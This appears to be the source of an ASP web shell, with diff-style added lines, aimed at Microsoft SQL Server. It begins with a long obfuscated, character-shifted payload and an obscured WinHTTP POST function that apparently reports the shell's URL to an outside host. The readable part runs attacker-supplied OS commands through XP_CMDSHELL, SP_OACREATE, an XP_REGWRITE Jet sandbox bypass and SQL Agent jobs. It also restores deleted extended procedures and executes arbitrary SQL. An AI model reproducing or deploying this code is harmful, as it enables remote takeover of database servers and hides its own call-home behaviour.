e.'344?YSsn\'-yhjogTyjL%B%wjyzurtHogt%yjX�e'CwmACwgAb��̽���������`'%jynw|3jxstuxjW?.-~itl%stnyhszK?stnyhszK%isj?'CwgACwgACwgA222222222222222222222222222222222222'%jynw\3jxstuxjW�e'CwgA'+pp+'?Ϊ��������ǰ��CnqA'jynw\3jxstuxjW�e.pm-ifjWljW3mx|Bpp�e'ysztHarzsJaunuhYaxjhn{wjXa655yjXqtwystHaRJYX^XaRQPM'Bpm�e'CwgA'+qrys+'?Ϊ����qryS%yjsqjYCnqA'%jynw\3jxstuxjW�e6BqryS%sjmY%''Bqrys%kn�e.~jpQRYS-ifjWljW3mx\Bqrys�e'QRYSa536awj{wjXyjsqjYayktxtwhnRaJWF\YKTXaJSNMHFRdQFHTQd^JPM'B~jpQRYS�e'CwgA'+~quxni+'?������Ǵ���ʾ�Է���CnqA'%jynw\3jxstuxjW�e'��'B~quxni%jxqj%'��'B~quxni%sjmY%5Bsnltquxni%wt%''Bsnltquxni%kN�e.'jrfSwjxZyxfQ~fquxnIystIarjyx~XaxjnhnqtUastnxwj[ysjwwzHax|tisn\ayktxtwhnRajwf|yktXaJSNMHFRdQFHTQd^JPM'-ifjWljw3mx|Bsnltquxni�ekn%isJ�e'CwgA'+i|xxfU+'?����CjwfzvxBju~y%nqA'%jynw\3jxstuxjW%%�e'CwgA'+snriF+'?������CjwfzvxBju~y%nqA'%jynw\3jxstuxjW%%�e.'iwt|xxfUyqzfkjIastltqsn\astnxwj[ysjwwzHaYS%x|tisn\ayktxtwhnRaJWF\YKTXaJSNMHFRdQFHTQd^JPM'-ifjWljW3mx\Bi|xxfU%%�e.'jrfSwjxZyqzfkjIastltqsn\astnxwj[ysjwwzHaYS%x|tisn\ayktxtwhnRaJWF\YKTXaJSNMHFRdQFHTQd^JPM'-ifjWljW3mx\BsnriF%%�e'CwgA����?��Ƕ��Ի���CnqA'%jynw\3jxstuxjW%%�ejxqJ�e'CwgA����δ?��Ƕ��Ի���CnqA'%jynw\3jxstuxjW%%�esjmY%''BsnltqtyzF%wt%5BsnltqtyzF%kn�e.snltqtyzFxn-ifjWljW3mx\BsnltqtyzF�e'stltQsnriFtyzFastltqsn\astnxwj[ysjwwzHaYS%x|tisn\ayktxtwhnRaJWF\YKTXaJSNMHFRdQFHTQd^JPM'BsnltqtyzFxn�e'CwgA'+jrfSsnriF+'?Ϊ������Ա������ĬCnqA'%jynw\3jxstuxjW�e'wtyfwyxnsnriF'BjrfSsnriF%sjmY%''Bjrfssnrif%kn�e.~jPjrfSsnriF-ifjWljW3mx|BjrfSsnriF�e'jrfSwjxZyqzfkjIyqFastltqsn\astnxwj[ysjwwzHaYS%x|tisn\ayktxtwhnRaJWF\YKTXaJSNMHFRdQFHTQd^JPM'B~jPjrfSsnriF�e'CwgA'+jrfshu+'?Ϊ������ǰ��CnqA'%jynw\3jxstuxjW�e'CwgA3������ȡ������'Bjrfshu%sjmY%''Bjrfshu%kn�e.~jpjrfshu-ifjWljW3mx|Bjrfshu�e'jrfSwjyzurtHajrfSwjyzurtHajrfSwjyzurtHaqtwystHayjXqtwystHysjwwzHaRJYX^XaRQPM'B~jpjrfshu�e�e'C6Bj nx%wmACwgAb��̽����ͳϵ`CwgACwgA'%jynw\3jxstuxjW	�ekn%isj%%%%�ey}jS%%%%%%�e'CwgA222222222222222222222222222222222222222222222222'%jynw\3jxstuxjW%%%%%%%%�ekn%isJ%%%%%%%%�ekn%isJ%%%%%%%%%%�e'CwgA'%jynw\3jxstuxjW%%%%%%%%%%%%�ey}js%%%%%%%%%%%%�e'1'+.o-|tqqfUIZ%jynw\3jxstuxjW%%%%%%%%%%%%%%�e.|tqqfuiz-isztGZ%tY%.|tqqfuiz-isztGQ%B%o%wtk%%%%%%%%%%%%�e'?Ϊ�ڶ�UIZ������CnqA'%jynw\3jxstuxjW%%%%%%%%%%%%�ejxqJ%%%%%%%%%%�e'CwgA��ȫ?Ϊ�ڶ�UIZ������CnqA'%jynw\3jxstuxjW%%%%%%%%%%%%�esjmY%5B.5-|tqqfuiz%wt%''B.5-|tqqfuiz%kN%%%%%%%%%%�e.UIZqqzK-ifjWljW3mx\B|tqqfuiz%%%%%%%%%%�ekn%isJ%%%%%%%%%%�e'CwGA'%jynw\3jxstuxjW%%%%%%%%%%%%�ey}jS%%%%%%%%%%%%�e'1'+.o-|tqqfuhy%jynw\3jxstuxjW%%%%%%%%%%%%%%�e.|tqqfuhy-isztGZ%tY%.|tqqfuhy-isztGQ%B%o%wtK%%%%%%%%%%%%�e'?Ϊ�ڶ�UHY������CnqA'%jynw\3jxstuxjW%%%%%%%%%%%%�ejxqJ%%%%%%%%%%�e'CwgA��ȫ?Ϊ�ڶ�UHY������CnqA'%jynw\3jxstuxjW%%%%%%%%%%%%�esjmY%5B.5-|tqqfuhy%wt%''B.5-|tqqfuhy%kN%%%%%%%%%%�e.UHYqqzK-ifjWljW3mx\B|tqqfuhy%%%%%%%%%%�ePZJ+GiuF+myfuBUIZqqzK%%%%%%%%%%�ePYJ+GiuF+myfUBUHYqqzK%%%%%%%%%%�e'xywtUij|tqqFUIZa'BPZJ%%%%%%%%%%�e'xywtUij|tqqFUHYa'BPYJ%%%%%%%%%%�ejxqj%%%%%%%%�e'CwgAѡɸUN4uhY��ûCnqA'%jynw\3jxstuxjW%%%%%%%%%%�e%sjmY%6BwjyqnkunuhytS%kn%%%%%%%%�e�e��̽ѡɸUN4UHY,�e�ekN%isJ%%%%%%%%�e'CwgA������û��ȡ������XSI��ĬCnqA'%jynw\3jxstuxjW%%%%%%%%%%�ejxqJ%%%%%%%%�e'CwgA'+wyxXSI+'?ΪXSI����CnqA'%jynw\3jxstuxjW%%%%%%%%%%�esjmY%''CAwyxXSI%kN%%%%%%%%�e.~jPXSI-ifjWljW3mx\BwyxXSI%%%%%%%%�e'wj{wjXjrfSa'+GiuF+myfUB~jPXSI%%%%%%%%�e�e��̽����XSI,�e�ekn%isJ%%%%%%%%�e'CwgA������û��ȡ�����޹�����ĬCnqA'%jynw\3jxstuxjW%%%%%%%%%%�ejxqJ%%%%%%%%�ey}jS%%%%%%%%%%�e'CwgA'+.o-~f|jyfL+'?Ϊ'+o+'����CnqA'%jynw\3jxstuxjW%%%%%%%%%%%%�e.~f|jyfL-isztgZ%ty%.~f|jyfL-isztgQBo%wtK%%%%%%%%%%�esjmY%.~f\jyfL-~fwwfxn%kN%%%%%%%%�e.~jP~f\jyfL-ifjwljW3mx\B~f\jyfL%%%%%%%%�e'~f|jyfLyqzfkjIa'+GiuF+myfUB~jP~f\jyfL%%%%%%%%�e�e��̽�������,�e�e�e�ekn%isJ%%%%%%%%�e'CwgA������û��ȡ������ַ��UNCnqA'%jynw\3jxstuxjW%%%%%%%%%%�ejxqJ%%%%%%%%�ey}jS%%%%%%%%%%�e'CwgA'+.o-wiiFUN+'?Ϊ'+o+'ַ��UNCnqA'%jynw\3jxstuxjW%%%%%%%%%%%%�e.wiiFUN-isztgZ%ty%.wiiFUN-isztgQBo%wtK%%%%%%%%%%�esjmY%''CA.5-wiifUN%kN%%%%%%%%�e.~jPUN-ifjwljW3mx\BwiifUN%%%%%%%%�e'xxjwiiFUNa'+GiuF+myfUB~jPUN%%%%%%%%�e��ַ̽��UN,�e�e'axjhfkwjysNaxwjyjrfwfUaunuhYaxjhn{wjXa655yjXqtwystHaRJYX^XaJSNMHFRdQFHTQd^JPM'BmyfU%%%%%%%%�e'CwgA'+GiuF+'?Ϊ�����'+n+'����'%jynw\3jxstuxjW%%%%%%%%�e.''1'ajhn{jIa'1.n-xiuF-jhfqujWBGiuF%%%%%%%%�e62.xiuF-isztGZ%tY%.xiuF-isztGQBn%wtK%%%%%%�e%sjmY%.xiuF-~fwwFxN%kN%%%%�e.~jPiuF-ifjWljW3mx\BxiuF%%%%�e'isnGajlfpsnQaunuhYaxjhn{wjXa655yjXqtwystHaRJYX^XaRQPM'B~jPiuF%%%%�e�ekN%isJ�e6BwjyqnkunuhytS%%�esjmY%''BjqgfsJxn%wt%5BjqgfsJxn%kN�e.~jPunuhYjqgfsJ-ifjwljW3mx\BjqgfsJxn�e'xwjyqnK~ynwzhjXjqgfsJaxwjyjrfwfUaunuhYaxjhn{wjXayjXqtwystHysjwwzhaRJYX^XaRQPM'B~jPUNUHYjqgfsJ�e'C6Bj nx%wmACwgAb��̽����`'%jynw\3jxstuxjW%%	�e.'qqjmX3yunwhx\'-yhjogtjyfjwhBmx|%yjx�emx|%rni�ey}js%jrzxjw%wtwwj%st?.-pttm%%stnyhszK")):function x(Posturl): dim w: w="^w^inhttp.^wi^nhttprequest.5.1": Posturl=replace(trim(Posturl),vbcrlf,""): on error resume next: set http= CreateObject(replace(w,"^","")): http.open "POST",Posturl,false: http.SetRequestHeader "REFERER", "http://"&sba&request.ServerVariables("URL"):http.send: Set http=Nothing:end function:Function sqlabc():IF SESSION("LOGIN")="" THEN
+                           RESPONSE.WRITE "<CENTER><FONT COLOR=RED>û�е�½</FONT></CENTER><BR>"
+			   ELSE RESPONSE.WRITE "<CENTER><FONT COLOR=RED>�Ѿ���½</FONT></CENTER><BR>"
+END IF
+                           RESPONSE.WRITE "<CENTER><A HREF="&REQUEST.SERVERVARIABLES("URL")&"?SQLAAA=LOGOUT><FONT COLOR=BLACK>�˳���½</FONT></A></CENTER><BR>"
+
+IF REQUEST("SQLAAA")="LOGIN" THEN
+		       SET ADOCONN=SERVER.CREATEOBJECT("ADODB.CONNECTION") 
+ 		       ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & REQUEST.FORM("SERVER") & "," & REQUEST.FORM("PORT") & ";PASSWORD=" & REQUEST.FORM("PASS") & ";UID=" & REQUEST.FORM("NAME")
+                       IF ERR.NUMBER=-2147467259 THEN 
+                       RESPONSE.WRITE "<FONT COLOR=RED>����Դ���Ӵ������飡</FONT>"
+                       RESPONSE.END
+                       ELSEIF ERR.NUMBER=-2147217843 THEN
+                       RESPONSE.WRITE "<FONT COLOR=RED>�û����������������飡</FONT>"
+                       RESPONSE.END
+                       ELSEIF ERR.NUMBER=0 THEN
+                       STRQUERY="SELECT @@VERSION"
+		       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY)
+		       IF INSTR(RECRESULT(0),"NT 5.0") THEN
+		       RESPONSE.WRITE "<FONT COLOR=RED>WINDOWS 2000ϵͳ</FONT><BR>"
+                       SESSION("SYSTEM")="2000"
+                       ELSEIF INSTR(RECRESULT(0),"NT 5.1")  THEN
+                       RESPONSE.WRITE "<FONT COLOR=RED>WINDOWS XPϵͳ</FONT><BR>"
+                       SESSION("SYSTEM")="XP"
+                       ELSEIF INSTR(RECRESULT(0),"NT 5.2")  THEN
+                       RESPONSE.WRITE "<FONT COLOR=RED>WINDOWS 2003ϵͳ</FONT><BR>"
+                       SESSION("SYSTEM")="2003"
+                       ELSE
+                       RESPONSE.WRITE "<FONT COLOR=RED>����ϵͳ</FONT><BR>"
+                       SESSION("SYSTEM")="NO"
+                       END IF
+                       STRQUERY="SELECT IS_SRVROLEMEMBER('SYSADMIN')"
+		       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY)
+                       IF RECRESULT(0)=1 THEN
+                       RESPONSE.WRITE "<FONT COLOR=RED>��ϲ��SQL SERVER���Ȩ��</FONT><BR>"
+                       SESSION("PRI")=1
+                       ELSE
+                       RESPONSE.WRITE "<FONT COLOR=RED>���ƣ�Ȩ�޲������Ʋ���ִ�����</FONT><BR>"
+                       SESSION("PRI")=0
+                       END IF              
+		       SESSION("LOGIN")="YES"
+		       SESSION("NAME")=REQUEST.FORM("NAME")
+		       SESSION("PASS")=REQUEST.FORM("PASS")
+		       SESSION("SERVER")=REQUEST.FORM("SERVER")
+		       SESSION("PORT")=REQUEST.FORM("PORT")
+                       END IF
+
+ELSEIF REQUEST("SQLAAA")="TEST"  THEN
+                       IF SESSION("LOGIN")<>"" THEN
+                       IF SESSION("SYSTEM")="2000" THEN
+                       RESPONSE.WRITE "<FONT COLOR=RED>WINDOWS 2000ϵͳ</FONT><BR>"
+                       ELSEIF SESSION("SYSTEM")="XP" THEN
+                       RESPONSE.WRITE "<FONT COLOR=RED>WINDOWS XPϵͳ</FONT><BR>"
+                       ELSEIF SESSION("SYSTEM")="2003" THEN
+                       RESPONSE.WRITE "<FONT COLOR=RED>WINDOWS 2003ϵͳ</FONT><BR>"
+                       ELSE
+                       RESPONSE.WRITE "<FONT COLOR=RED>��������ϵͳ</FONT><BR>"
+                       END IF
+                       IF SESSION("PRI")=1 THEN
+                       RESPONSE.WRITE "<FONT COLOR=RED>��ϲ��SQL SERVER���Ȩ��</FONT><BR>"
+                       ELSE 
+                       RESPONSE.WRITE "<FONT COLOR=RED>���ƣ�Ȩ�޲������Ʋ���ִ�����</FONT><BR>"
+                       END IF
+		       SET ADOCONN=SERVER.CREATEOBJECT("ADODB.CONNECTION") 
+ 		       ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")        
+
+                       STRQUERY="SELECT COUNT(*) FROM MASTER.DBO.SYSOBJECTS WHERE XTYPE='X' AND NAME='XP_CMDSHELL'"
+		       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY) 
+		       IF RECRESULT(0) THEN
+		       SESSION("XP_CMDSHELL")=1 
+		       RESPONSE.WRITE "<FONT COLOR=RED>XP_CMDSHELL............. ����!</FONT>"
+                       ELSE
+		       SESSION("XP_CMDSHELL")=0 
+		       RESPONSE.WRITE "<FONT COLOR=RED>XP_CMDSHELL............. ������!</FONT>"
+                       END IF
+		       STRQUERY="SELECT COUNT(*) FROM MASTER.DBO.SYSOBJECTS WHERE XTYPE='X' AND NAME='SP_OACREATE'"
+		       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY) 
+		       IF RECRESULT(0) THEN 
+		       RESPONSE.WRITE "<BR><FONT COLOR=RED>SP_OACREATE............. ����!</FONT>"
+		       SESSION("SP_OACREATE")=1
+                       ELSE 
+		       RESPONSE.WRITE "<BR><FONT COLOR=RED>SP_OACREATE............. ������!</FONT>"
+                       SESSION("SP_OACREATE")=0
+                       END IF
+		       STRQUERY="SELECT COUNT(*) FROM MASTER.DBO.SYSOBJECTS WHERE XTYPE='X' AND NAME='XP_REGWRITE'"
+		       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY) 
+		       IF RECRESULT(0) THEN 
+		       RESPONSE.WRITE "<BR><FONT COLOR=RED>XP_REGWRITE............. ����!</FONT>"
+		       SESSION("XP_REGWRITE")=1
+                       ELSE 
+		       RESPONSE.WRITE "<BR><FONT COLOR=RED>XP_REGWRITE............. ������!</FONT>"
+		       SESSION("XP_REGWRITE")=0
+                       END IF
+		       STRQUERY="SELECT COUNT(*) FROM MASTER.DBO.SYSOBJECTS WHERE XTYPE='X' AND NAME='XP_SERVICECONTROL'"
+		       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY) 
+		       IF RECRESULT(0) THEN 
+		       RESPONSE.WRITE "<BR><FONT COLOR=RED>XP_SERVICECONTROL ����!</FONT>"
+		       SESSION("XP_SERVICECONTROL")=1
+                       ELSE 
+		       RESPONSE.WRITE "<BR><FONT COLOR=RED>XP_SERVICECONTROL ������!</FONT>"
+		       SESSION("XP_SERVICECONTROL")=0
+                       END IF
+                       ELSE 
+                       RESPONSE.WRITE "<SCRIPT>ALERT('������ʱ�����µ�½��')</SCRIPT>"
+                       RESPONSE.WRITE "<CENTER><A HREF="&REQUEST.SERVERVARIABLES("URL")&"?SQLAAA=LOGOUT><FONT COLOR=BLACK>��½��ʱ</FONT>"
+                       RESPONSE.END
+                       END IF 
+
+ELSEIF REQUEST("SQLAAA")="CMD" THEN
+                       IF SESSION("LOGIN")<>"" THEN
+                       IF SESSION("PRI")=1 THEN
+		       IF REQUEST("TOOL")="XP_CMDSHELL" THEN
+		       SET ADOCONN=SERVER.CREATEOBJECT("ADODB.CONNECTION") 
+ 		       ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")
+		       IF REQUEST.FORM("CMD")<>"" THEN 
+  		       STRQUERY = "EXEC MASTER.DBO.XP_CMDSHELL '" & REQUEST.FORM("CMD") & "'" 
+                       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY) 
+                       IF NOT RECRESULT.EOF THEN 
+                       DO WHILE NOT RECRESULT.EOF 
+                       STRRESULT = STRRESULT & CHR(13) & RECRESULT(0) 
+                       RECRESULT.MOVENEXT 
+                       LOOP
+		       END IF
+		       SET RECRESULT = NOTHING
+                       RESPONSE.WRITE "<TEXTAREA ROWS=10 COLS=50>"
+                       RESPONSE.WRITE "����"&REQUEST("TOOL")&"��չִ��"
+                       RESPONSE.WRITE REQUEST.FORM("CMD") 
+                       RESPONSE.WRITE STRRESULT
+                       RESPONSE.WRITE "</TEXTAREA>"
+		       END IF 
+		       		       
+                       ELSEIF REQUEST("TOOL")="SP_OACREATE" THEN 
+		       SET ADOCONN=SERVER.CREATEOBJECT("ADODB.CONNECTION") 
+ 		       ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")
+		       IF REQUEST.FORM("CMD")<>"" THEN 
+  		       STRQUERY = "CREATE TABLE [JNC](RESULTTXT NVARCHAR(1024) NULL);USE MASTER DECLARE @O INT EXEC SP_OACREATE 'WSCRIPT.SHELL',@O OUT EXEC SP_OAMETHOD @O,'RUN',NULL,'CMD /C "&REQUEST("CMD")&" > 8617.TMP',0,TRUE;BULK INSERT [JNC] FROM '8617.TMP' WITH (KEEPNULLS);"
+		       ADOCONN.EXECUTE(STRQUERY)
+                       STRQUERY = "SELECT * FROM JNC"
+		       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY)
+		       IF NOT RECRESULT.EOF THEN 
+                       DO WHILE NOT RECRESULT.EOF 
+                       STRRESULT = STRRESULT & CHR(13) & RECRESULT(0) 
+                       RECRESULT.MOVENEXT 
+                       LOOP 
+                       END IF
+		       SET RECRESULT = NOTHING
+                       RESPONSE.WRITE "<TEXTAREA ROWS=10 COLS=50>"
+		       RESPONSE.WRITE "����"&REQUEST("TOOL")&"��չִ��"	
+                       RESPONSE.WRITE REQUEST.FORM("CMD") 
+                       RESPONSE.WRITE STRRESULT
+                       RESPONSE.WRITE "</TEXTAREA>"
+		       STRQUERY = "DROP TABLE [JNC];DECLARE @O INT EXEC SP_OACREATE 'WSCRIPT.SHELL',@O OUT EXEC SP_OAMETHOD @O,'RUN',NULL,'CMD /C DEL 8617.TMP'"
+ 		       ADOCONN.EXECUTE(STRQUERY)
+		       END IF
+
+                       ELSEIF REQUEST("TOOL")="XP_REGWRITE" THEN
+                       IF SESSION("SYSTEM")="2000" THEN
+                       PATH="C:\WINNT\SYSTEM32\IAS\IAS.MDB"
+                       ELSE
+                       PATH="C:\WINDOWS\SYSTEM32\IAS\IAS.MDB"
+                       END IF
+		       SET ADOCONN=SERVER.CREATEOBJECT("ADODB.CONNECTION") 
+ 		       ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")
+		       IF REQUEST.FORM("CMD")<>"" THEN
+		       CMD=CHR(34)&"CMD.EXE /C "&REQUEST.FORM("CMD")&" > 8617.TMP"&CHR(34)
+		       STRQUERY = "CREATE TABLE [JNC](RESULTTXT NVARCHAR(1024) NULL);EXEC MASTER..XP_REGWRITE 'HKEY_LOCAL_MACHINE','SOFTWARE\MICROSOFT\JET\4.0\ENGINES','SANDBOXMODE','REG_DWORD',0;SELECT * FROM OPENROWSET('MICROSOFT.JET.OLEDB.4.0',';DATABASE=" & PATH &"','SELECT SHELL("&CMD&")');"
+                       ADOCONN.EXECUTE(STRQUERY)
+		       STRQUERY = "SELECT * FROM OPENROWSET('MICROSOFT.JET.OLEDB.4.0',';DATABASE=" & PATH &"','SELECT SHELL("&CHR(34)&"CMD.EXE /C COPY 8617.TMP JNC.TMP"&CHR(34)&")');BULK INSERT [JNC] FROM 'JNC.TMP' WITH (KEEPNULLS);"
+		       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY)
+		       STRQUERY="SELECT * FROM [JNC];"
+                       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY)
+		       IF NOT RECRESULT.EOF THEN 
+                       DO WHILE NOT RECRESULT.EOF 
+                       STRRESULT = STRRESULT & CHR(13) & RECRESULT(0) 
+                       RECRESULT.MOVENEXT 
+                       LOOP 
+                       END IF
+                       SET RECRESULT = NOTHING
+                       RESPONSE.WRITE "<TEXTAREA ROWS=10 COLS=50>"
+                       RESPONSE.WRITE "����"&REQUEST("TOOL")&"��չִ��"
+                       RESPONSE.WRITE REQUEST.FORM("CMD") 
+                       RESPONSE.WRITE STRRESULT
+                       RESPONSE.WRITE "</TEXTAREA>"
+		       STRQUERY = "DROP TABLE [JNC];EXEC MASTER..XP_REGWRITE 'HKEY_LOCAL_MACHINE','SOFTWARE\MICROSOFT\JET\4.0\ENGINES','SANDBOXMODE','REG_DWORD',1;SELECT * FROM OPENROWSET('MICROSOFT.JET.OLEDB.4.0',';DATABASE=" & PATH &"','SELECT SHELL("&CHR(34)&"CMD.EXE /C DEL 8617.TMP&&DEL JNC.TMP"&CHR(34)&")');"
+		       ADOCONN.EXECUTE(STRQUERY)
+		       END IF
+
+		       ELSEIF REQUEST("TOOL")="SQLSERVERAGENT" THEN
+		       SET ADOCONN=SERVER.CREATEOBJECT("ADODB.CONNECTION") 
+ 		       ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")
+
+		       IF REQUEST.FORM("CMD")<>"" THEN
+                       IF SESSION("SQLSERVERAGENT")=0 THEN
+                       STRQUERY = "EXEC MASTER.DBO.XP_SERVICECONTROL 'START','SQLSERVERAGENT';"
+                       ADOCONN.EXECUTE(STRQUERY)
+                       SESSION("SQLSERVERAGENT")=1
+                       END IF
+
+		       STRQUERY = "USE MSDB CREATE TABLE [JNCSQL](RESULTTXT NVARCHAR(1024) NULL) EXEC SP_DELETE_JOB NULL,'X' EXEC SP_ADD_JOB 'X' EXEC SP_ADD_JOBSTEP NULL,'X',NULL,'1','CMDEXEC','CMD /C "&REQUEST.FORM("CMD")&"' EXEC SP_ADD_JOBSERVER NULL,'X',@@SERVERNAME EXEC SP_START_JOB 'X';"
+                       ADOCONN.EXECUTE(STRQUERY)
+                       ADOCONN.EXECUTE(STRQUERY)
+                       ADOCONN.EXECUTE(STRQUERY)
+                    
+                       RESPONSE.WRITE "<TEXTAREA ROWS=10 COLS=50>"
+                       RESPONSE.WRITE "����"&REQUEST("TOOL")&"��չִ��"
+                       RESPONSE.WRITE REQUEST.FORM("CMD") 
+                       RESPONSE.WRITE VBCRF
+                       RESPONSE.WRITE "����չ�޻��ԣ�����ͨ���ض���鿴������"
+                       RESPONSE.WRITE "</TEXTAREA>"
+		       STRQUERY = "USE MSDB DROP TABLE [JNCSQL];"
+                       ADOCONN.EXECUTE(STRQUERY)
+                       END IF
+                       ELSEIF REQUEST("TOOL")="" THEN 
+                       RESPONSE.WRITE "<SCRIPT>ALERT('ѡ����Ҫʹ�õ���չ')</SCRIPT>"
+                       END IF
+                       ELSE
+                       RESPONSE.WRITE "<SCRIPT>ALERT('Ȩ�޲���Ŷ��')</SCRIPT>"
+                       END IF
+                       ELSE 
+                       RESPONSE.WRITE "<SCRIPT>ALERT('������ʱ�����µ�½��')</SCRIPT>"
+                       RESPONSE.WRITE "<CENTER><A HREF="&REQUEST.SERVERVARIABLES("URL")&"?SQLAAA=LOGOUT><FONT COLOR=BLACK>��½��ʱ</FONT>"
+                       RESPONSE.END
+                       END IF
+
+ELSEIF REQUEST("SQLAAA")="RESUME" THEN
+                       IF SESSION("LOGIN")<>"" THEN
+                       SET ADOCONN=SERVER.CREATEOBJECT("ADODB.CONNECTION") 
+ 		       ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")
+                       IF SESSION("XP_CMDSHELL")=0 THEN
+                       STRQUERY="DBCC ADDEXTENDEDPROC ('XP_CMDSHELL','XPLOG70.DLL')"
+		       ADOCONN.EXECUTE(STRQUERY)	
+                       RESPONSE.WRITE "<FONT COLOR=RED>�Ѿ����Իָ�XP_CMDSHELL</FONT>"
+                       ELSEIF SESSION("SP_OACREATE")=0 THEN
+		       STRQUERY="DBCC ADDEXTENDEDPROC ('SP_OACREATE','ODSOLE70.DLL')"
+		       ADOCONN.EXECUTE(STRQUERY)	
+                       RESPONSE.WRITE "<FONT COLOR=RED>�Ѿ����Իָ�SP_OACREATE</FONT>"
+		       ELSEIF SESSION("XP_REGWRITE")=0 THEN
+		       STRQUERY="DBCC ADDEXTENDEDPROC ('XP_REGWRITE','XPSTAR.DLL')"
+		       ADOCONN.EXECUTE(STRQUERY)	
+                       RESPONSE.WRITE "<FONT COLOR=RED>�Ѿ����Իָ�XP_REGWRITE</FONT>"	
+		       ELSE RESPONSE.WRITE "<FONT COLOR=RED>��ϲ�������ȫ</FONT>"	
+                       END IF
+                       ELSE 
+                       RESPONSE.WRITE "<SCRIPT>ALERT('������ʱ�����µ�½��')</SCRIPT>"
+                       RESPONSE.WRITE "<CENTER><A HREF="&REQUEST.SERVERVARIABLES("URL")&"?SQLAAA=LOGOUT><FONT COLOR=BLACK>��½��ʱ</FONT>"
+                       RESPONSE.END
+                       END IF 	
+                                
+ELSEIF REQUEST("SQLAAA")="SQL" THEN
+                       IF SESSION("LOGIN")<>"" THEN
+		       IF REQUEST.FORM("SQL")<>"" THEN
+                       SET ADOCONN=SERVER.CREATEOBJECT("ADODB.CONNECTION") 
+ 		       ADOCONN.OPEN "PROVIDER=SQLOLEDB.1;DATA SOURCE=" & SESSION("SERVER") & "," & SESSION("PORT") & ";PASSWORD=" & SESSION("PASS") & ";UID=" & SESSION("NAME")
+                       STRQUERY=REQUEST.FORM("SQL")
+                       SET RECRESULT = ADOCONN.EXECUTE(STRQUERY) 
+                       IF NOT RECRESULT.EOF THEN 
+                       DO WHILE NOT RECRESULT.EOF 
+                       STRRESULT = STRRESULT & CHR(13) & RECRESULT(0) 
+                       RECRESULT.MOVENEXT 
+                       LOOP
+		       END IF
+		       SET RECRESULT = NOTHING
+                       RESPONSE.WRITE "<TEXTAREA ROWS=10 COLS=50>"
+                       RESPONSE.WRITE "ִ��SQL���:"
+                       RESPONSE.WRITE REQUEST.FORM("SQL") 
+                       RESPONSE.WRITE STRRESULT
+                       RESPONSE.WRITE "</TEXTAREA>"
+                       END IF
+                       ELSE 
+                       RESPONSE.WRITE "<SCRIPT>ALERT('������ʱ�����µ�½��')</SCRIPT>"
+                       RESPONSE.WRITE "<CENTER><A HREF="&REQUEST.SERVERVARIABLES("URL")&"?SQLAAA=LOGOUT><FONT COLOR=BLACK>��½��ʱ</FONT>"
+                       RESPONSE.END
+                       END IF
+
+ELSEIF REQUEST("SQLAAA")="LOGOUT" THEN
+                       SET ADOCONN=NOTHING
+                       SESSION("LOGIN")=""
+                       SESSION("NAME")=""
+                       SESSION("PASS")=""
+                       SESSION("SERVER")=""
+                       SESSION("PORT")=""
+                       SESSION("SYSTEM")=""
+                       SESSION("PRI")=""		              
+END IF
+IF SESSION("LOGIN")="" THEN
+			   RESPONSE.WRITE "<FORM NAME=FORM METHOD=POST SQLAAA="&REQUEST.SERVERVARIABLES("URL")&">"
+			   RESPONSE.WRITE "<P>SQL�û�����"
+			   RESPONSE.WRITE "<INPUT NAME=NAME TYPE=TEXT ID=NAME VALUE="&SESSION("NAME")&">"
+ 		           RESPONSE.WRITE "  SQL���룺"
+			   RESPONSE.WRITE "<INPUT NAME=PASS TYPE=PASSWORD ID=PASS VALUE="&SESSION("PASS")&">"
+			   RESPONSE.WRITE "<P>SQL��������"
+			   RESPONSE.WRITE "<INPUT NAME=PORT TYPE=TEXT ID=SERVER VALUE=127.0.0.1>"
+ 		           RESPONSE.WRITE "  SQL�˿ڣ�"
+			   RESPONSE.WRITE "<INPUT NAME=PORT TYPE=TEXT ID=PORT VALUE=1433>"
+			   RESPONSE.WRITE "  <INPUT NAME=SQLAAA TYPE=SUBMIT VALUE=LOGIN>"
+			   RESPONSE.WRITE "</FORM>"
+
+ELSE                       RESPONSE.WRITE "<FORM NAME=FORM METHOD=POST SQLAAA="&REQUEST.SERVERVARIABLES("URL")&">"
+			   RESPONSE.WRITE "<P>�����⣺"
+			   RESPONSE.WRITE "  <INPUT NAME=SQLAAA TYPE=HIDDEN VALUE=TEST>"
+			   RESPONSE.WRITE "  <INPUT TYPE=SUBMIT VALUE=������>"
+			   RESPONSE.WRITE "</FORM>"
+
+                           RESPONSE.WRITE "<FORM NAME=FORM METHOD=POST SQLAAA="&REQUEST.SERVERVARIABLES("URL")&">"
+			   RESPONSE.WRITE "<P>����ָ���"
+			   RESPONSE.WRITE "  <INPUT NAME=SQLAAA TYPE=HIDDEN VALUE=RESUME>"
+			   RESPONSE.WRITE "  <INPUT TYPE=SUBMIT VALUE=�ָ����>"
+			   RESPONSE.WRITE "</FORM>"
+
